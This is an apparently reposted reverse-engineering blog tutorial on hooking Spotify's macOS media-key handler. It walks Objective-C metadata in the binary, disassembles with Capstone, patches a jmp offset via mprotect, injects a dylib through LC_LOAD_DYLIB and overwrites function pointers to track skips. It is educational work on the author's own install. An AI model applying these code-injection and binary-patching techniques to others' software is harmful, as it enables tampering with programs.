Once we find the section with the correct name, we copy it into our target variable and exit the loop. Now that we can iterate over the objc_class structs, we need to know how to get the class name and method names for each class. While the Objective-C runtime is open source, I couldn't find the type declarations corresponding to the version of Objective-C used in the Spotify binary, so you can declare the types yourself (a sketch of possible declarations appears at the end of this section). The fields are of type uint64_t instead of pointers because they are used as offsets into the file. The __DATA segment could be mmap'd and then the values treated as pointers, but this leads to complications when mmap is unable to allocate the segment at its original address.

Anyways, the data field of objc_class "points" to an objc_class_data structure. This structure contains both the name of the class and a base_methods "pointer" to the methods defined for this class. The method list consists of an objc_methodlist struct followed by objc_methodlist.count objc_method structures. Each objc_method struct will tell us the method name and its imp pointer (and its type signature, but we don't really care about that).

I'll link to the code later, but it's a straightforward extension of the previous code listings to iterate through the classes to find our SPTBrowserClientMacObjCAnnex class and iterate through the class's methods to find the mediaKeyTap:receivedMediaKeyEvent: selector.
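To make that extension concrete, here is a minimal sketch of what those declarations and the lookup loop might look like. Note that the field layouts below are my assumptions based on the descriptions above (not official runtime definitions), and the 0xffffff virtual-address-to-file-offset mask mirrors the one applied to meth->imp in the next section:

//objc types, with uint64_t "pointers" (file offsets after masking)
// note: these layouts are assumed from the descriptions above
typedef struct {
    uint64_t isa, superclass, cache, vtable;
    uint64_t data;              //"points" to objc_class_data
} objc_class;

typedef struct {
    uint32_t flags, inst_start, inst_size, reserved;
    uint64_t ivar_layout;
    uint64_t name;              //"points" to the class name
    uint64_t base_methods;      //"points" to an objc_methodlist
} objc_class_data;

typedef struct {
    uint32_t entsize;
    uint32_t count;             //followed by `count` objc_method structs
} objc_methodlist;

typedef struct {
    uint64_t name;              //"points" to the selector string
    uint64_t types;
    uint64_t imp;
} objc_method;

//assumed conversion from virtual address to file offset
#define FILE_OFF(va) ((va) & 0xffffff)

uint64_t class_ptr, imp = 0;
char name[256];
objc_class cls;
objc_class_data cls_data;
objc_methodlist meth_list;
objc_method meth;

for (i=0; i<objc_classlist_sect.size/sizeof(uint64_t); i++) {
    //read the next class "pointer" from __objc_classlist
    fseek(fp, objc_classlist_sect.offset + i*sizeof(uint64_t), SEEK_SET);
    fread(&class_ptr, sizeof(class_ptr), 1, fp);

    //follow it to the objc_class, then to its class data
    fseek(fp, FILE_OFF(class_ptr), SEEK_SET);
    fread(&cls, sizeof(cls), 1, fp);
    fseek(fp, FILE_OFF(cls.data), SEEK_SET);
    fread(&cls_data, sizeof(cls_data), 1, fp);

    //grab & check the class name
    fseek(fp, FILE_OFF(cls_data.name), SEEK_SET);
    fread(name, 1, sizeof(name), fp);
    if (strcmp(name, "SPTBrowserClientMacObjCAnnex")) continue;

    //walk the method list, looking for our selector
    fseek(fp, FILE_OFF(cls_data.base_methods), SEEK_SET);
    fread(&meth_list, sizeof(meth_list), 1, fp);
    for (j=0; j<meth_list.count; j++) {
        fread(&meth, sizeof(meth), 1, fp);
        curr_off = ftell(fp);

        //grab & check the selector name
        fseek(fp, FILE_OFF(meth.name), SEEK_SET);
        fread(name, 1, sizeof(name), fp);
        if (!strcmp(name, "mediaKeyTap:receivedMediaKeyEvent:")) {
            imp = meth.imp;     //virtual address of the implementation
            break;
        }
        fseek(fp, curr_off, SEEK_SET);
    }
    break;
}

With the imp of mediaKeyTap:receivedMediaKeyEvent: in hand, we can move on to disassembling it.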
Finding the Call
Assuming we have the imp pointer for our mediaKeyTap: method, we can then use the Capstone library to disassemble the function and find the call to the media key tap handler:

#include <capstone/capstone.h>

uint8_t code[500];
size_t start_addr, i, insn_count;
uint64_t target_addr;

csh handle;
cs_insn *insn;

fseek(fp, (meth->imp) & 0xffffff, SEEK_SET);
fread(code, 1, 500, fp);

cs_open(CS_ARCH_X86, CS_MODE_64, &handle);

start_addr = meth->imp;
insn_count = cs_disasm(handle, code, 500, start_addr, 0, &insn);

for (i=0; i<insn_count; i++) {
    if (strcmp(insn[i].mnemonic, "mov") || strcmp(insn[i].op_str, "esi, 3"))
        continue;

    target_addr = strtoll(insn[i+2].op_str, NULL, 16);
    break;
}

We look for the "next" case (that is, mov esi, 3) since, if you look at the disassembly:

this case actually comes first in memory. We then take the instruction two after the mov esi, 3 instruction to find our target call. Remember that this subprocedure is actually a wrapper for our final target, so we have to perform the same disassembly procedure on the following function:

Taking note of the highlight, after checking some conditions, this function jumps to our final destination five instructions after preparing register esi with the contents of register r14d. Therefore, we can do something like:

...

if (strcmp(insn[i].mnemonic, "mov") || strcmp(insn[i].op_str, "esi, r14d"))
    continue;

*reloc_addr = insn[i+5].address+1;
*reloc_pc = insn[i+5].address + insn[i+5].size;
target_addr = strtoll(insn[i+5].op_str, NULL, 16);

...

Here, when we find our sentinel instruction, mov esi, r14d, in addition to setting our target address (the address of the function with the large switch statement), we set two additional variables: reloc_addr and reloc_pc.

To understand these two variables, we first need to cover how we will automate the hooking process.

Automatic Hooking
Normally, the control flow from our media key handler wrapper will look like:

However, we will patch instructions to make it look like:

The redirect to "my MK Handler" will be done through patching the jmp sub_100067E40 instruction in the Wrapper to actually be jmp &new MK Handler. Since jmp tells the CPU to set the new program counter (PC) relative to where it currently is, we need to know what the program counter will be after this instruction executes. This is where the variable reloc_pc comes into play. We set it to insn[i+5].address + insn[i+5].size because that is what the PC will be after the jmp executes.

We also need to know the address of the relative offset in the jmp instruction in order to patch it. Since the jmp opcode is only one byte, we set reloc_addr to insn[i+5].address+1.
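(One bit of housekeeping the listings above skip: once target_addr, reloc_addr, and reloc_pc have been recorded, the Capstone buffers can be released. A minimal sketch:)

//free the disassembled instructions & close the Capstone handle
// (safe to do once the target/reloc addresses are saved)
cs_free(insn, insn_count);
cs_close(&handle);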
Let’s do this: uint64_t prot_mask; uint64_t prot_addr; size_t prot_size;prot_mask = ~((1 << 12) - 1); // since page size is 4k prot_addr = mk_reloc_addr & prot_mask; prot_size = 4 + mk_reloc_addr - prot_addr;mprotect((void *)prot_addr, prot_size, PROT_WRITE);*mk_reloc_addr = (int32_t)((int64_t)(&new_mkHandler) - mk_reloc_pc);mprotect((void *)prot_addr, prot_size, PROT_READ | PROT_EXEC); where new_mkHandler is defined as: void new_mkHandler(void ***appDelegate, int32_t keyCode); Note that we have to mask off the lower twelve bits of mk_reloc_addr since mprotect requires that the address we pass be page-aligned. We then need to adjust the size of our protected region from four bytes (since the jump offset is 32 bits) to account for the difference between mk_reloc_addr and prot_addr. Let’s put some dummy code in new_mkHandler just to see if we hit it: void new_mkHandler(void ***appDelegate, int32_t keyCode) { printf("here!\n"); exit(69); } To load our dylib, we can use the code from Part 2 to insert a LC_LOAD_DYLIB command into the Mach-O file. If we do this and run the Spotify application, then sure enough we should see our print statement (if running through the command line) and we should have a nice exit code. Overwriting the Function Pointers Now to call our own prev and next subprocedures instead of Spotify’s will require some ingenuity. To see why, let’s take a look at the “next” case in the MK handler switch statement: Note that in the beginning of the function, the app delegate pointer (in rdi) is moved into register r13. Therefore, the code dereferences the app delegate twice and then moves a function pointer at offset 0x58 of that struct into register r12. This is the register that holds the address to the next subprocedure and is called at the bottom of the listing. Looking through the rest of MK handler, we can see that the offset 0x58 into the rax struct is only referenced here, so we can safely overwrite the function pointer at that address so the address of our own next subprocedure will be loaded into r12 and subsequently called. If we look at the “prev” case, we can see that the exact same steps are taken except the function pointer is located at offset 0x50 in the rax struct. Therefore, we can write some code in our new_mkHandler to overwrite these function pointers because we can make no assumptions as to the address of rax struct before the MK handler is called. The code will look something like this: typedef prev_next_func_t(int64_t, int64_t, int64_t);uint64_t prot_mask; uint64_t prot_addr; size_t prot_size; uint64_t fp_off; uint64_t *fp;prot_mask = ~((1 << 12) - 1); // since page size is 4kfp_off = (uint64_t)(**appDelegate) + 0x50; fp = (uint64_t *)fp_off;prevHandler = (prev_next_func_t *)(*fp); nextHandler = (prev_next_func_t *)(*(fp+1));prot_addr = fp_off & prot_mask; prot_size = 16 + fp_off - prot_addr;mprotect((void *)prot_addr, prot_size, PROT_WRITE);*fp = (uint64_t)(&new_prevHandler); *(fp+1) = (uint64_t)(&new_nextHandler);mprotect((void *)prot_addr, prot_size, PROT_READ | PROT_EXEC); Where new_prevHandler and new_nextHandler are defined as: void new_prevHandler(int64_t p1, int64_t p2, int64_t p3); void new_nextHandler(int64_t p1, int64_t p2, int64_t p3); It can be seen from the disassembly that the prev and next subprocedures take three 64-bit parameters but we don’t really need to know what they are. One gotcha is that we should only overwrite the function pointers once. To see why, think about what will happen the second time new_mkHandler is called. 
We set prevHandler to the first function pointer. However, we have already overwritten this function pointer with &new_prevHandler. Therefore, when we want to actually go to the previous track in new_prevHandler and call (*prevHandler)(p1, p2, p3), we will actually be calling new_prevHandler and will eventually overflow the stack. Therefore, we add a simple guard at the beginning to check if we have already overwritten the handlers:

if (gHandlersSet)
    goto call_original;

... overwrite function pointers ...

gHandlersSet = 1;

call_original:
    (*mkHandler)(appDelegate, keyCode);

Now in new_prevHandler and new_nextHandler, all we have to do is push/pop a skip when appropriate and call (*prevHandler)(p1, p2, p3) or (*nextHandler)(p1, p2, p3).

Wrapping Up
All that's left to do is get the current track and player position. Since these are exposed by Objective-C methods, we can use the functionality of the Objective-C runtime to call the appropriate functions without any patching, much like in Part 2.

Here's the link to the final repository, which I've refactored to include the macOS and iOS code: https://github.com/SamL98/SPSkip. I hope you enjoyed this exploration in patching and automated reverse engineering — I sure did!

Sursa: https://medium.com/swlh/skiptracing-automated-hook-resolution-74eda756533d